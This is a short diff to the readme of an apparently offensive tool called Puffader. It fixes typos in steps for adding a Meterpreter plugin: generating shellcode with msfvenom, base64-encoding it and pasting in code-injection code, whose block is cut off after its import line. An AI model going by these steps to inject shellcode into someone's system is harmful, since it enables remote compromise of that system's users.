xp4xbox/Puffader/readme.md

 ## Adding Meterpreter Plugin

-1. Generate raw shellcode using metasploit (eg. xr8\x02...).
+1. Generate raw shellcode using msfvenom (eg. xr8\x02...).
 2. Encode the shellcode to base64 by using [this](https://github.com/xp4xbox/Puffader/blob/master/Meterpreter_Plugin/base64encoder.py).
 3. Move the [code_injector module](https://github.com/xp4xbox/Puffader/blob/master/Meterpreter_Plugin/code_injector.py) to same dir as the program.
-4. Paste in this code afther the function to prevent multiple instances.
-Setting b64shellcode to be your encrypted shellcode
+4. Paste in this code after the function to prevent multiple instances.
+Setting b64shellcode to be your encrypted shellcode.
 ```
 import code_injector, base64
 # base64 shellcode